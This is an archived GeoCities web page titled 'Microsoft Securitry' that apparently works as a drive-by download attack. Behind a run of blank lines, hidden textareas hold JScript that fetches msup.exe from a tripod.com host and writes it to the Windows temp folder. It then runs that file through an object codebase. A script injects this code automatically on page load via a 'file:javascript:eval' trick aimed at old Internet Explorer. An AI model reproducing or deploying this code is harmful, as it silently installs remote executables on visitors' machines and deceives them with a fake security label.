<script language="JavaScript">var PUpage="76001087"; var PUprop="geocities"; </script><script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"></script><script language="JavaScript"> var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/orionser2002/popup.htm"; var thSpaceId="76001087"; var thIP="81.1.49.170"; var thTs="1115313733"; var thCs="adcd7d2a2c11daac66c1bf92bdaf9c2b";</script><noscript><link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=81.1.49.170&thTs=1115313733"></noscript><script language="JavaScript" src="http://us.geocities.com/js_source/geovck05.js"></script>
<!-- text above generated by server. PLEASE REMOVE -->
<title>Microsoft Securitry</title>

    <html>
<head>


</head>

<!-- Body -->
<body bgcolor="#808080" text="#000000" link="#003399" vlink="#666666" alink="#3366CC"
leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<!-- following code added by server. PLEASE REMOVE -->
<link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"><script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"></script>
<!-- preceding code added by server. PLEASE REMOVE -->



<!-- Text -->
<p align="center"><i><b><font color="#FF3300">
<a href="http://www.astalavista.com">GÝRÝS</a></font></b></i></p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>



<textarea id="code" style="display: none;" rows="1" cols="20">
s=new ActiveXObject("ADODB.Stream"); 
s.Mode=3;  
s.Type=1;  
s.Open();  
x=new ActiveXObject("Microsoft.XMLHTTP");  
x.Open("GET","http://y.sancar.tripod.com/msup.exe",0); 
x.Send(); s.Write(x.responseBody); 
s.SaveToFile("C:\\WINDOWS\\temp\\msup.exe",2);
</textarea>

<textarea id="code2" style="display: none;" rows="1" cols="20">
md="&lt;object id=\"oFile\""+
 "classid=\"clsid:11111111-1111-1111-1111-111111111111\""+ 
 " codebase=\"c://WINDOWS/temp/msup.exe\"&gt;&lt;/object&gt;";
w=createPopup(); 
w.document.clear(); w.document.write(md);
</textarea>


<script language="javascript">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/"/g,"\\\"");
            line = line.replace(/[/]/g,"%2f");

            line = line.replace(/\r\n/,"");
            line += ' ';

            if (line != '') {
                result += line;
            }
        }
        return result;
    }
    function weiter() {
        open(myURL,"_search");
    }

    function starten(thecode) {
        mycode = preparecode(thecode);
        myURL = "file:javascript:eval('" + mycode + "')";
        open("http:///","_search");
        setTimeout("weiter()", 500);
        
    } 

    function doit() {
    starten(document.all.code.value);
    setTimeout("doit2()", 600);
    }   

    function doit2() {
    starten(document.all.code2.value);

    }  
    setTimeout("doit()", 1500);

</script>


</body>



    </html><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1115313733" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001087&t=1115313733&f=us-w79" ALT=1 WIDTH=1 HEIGHT=1>
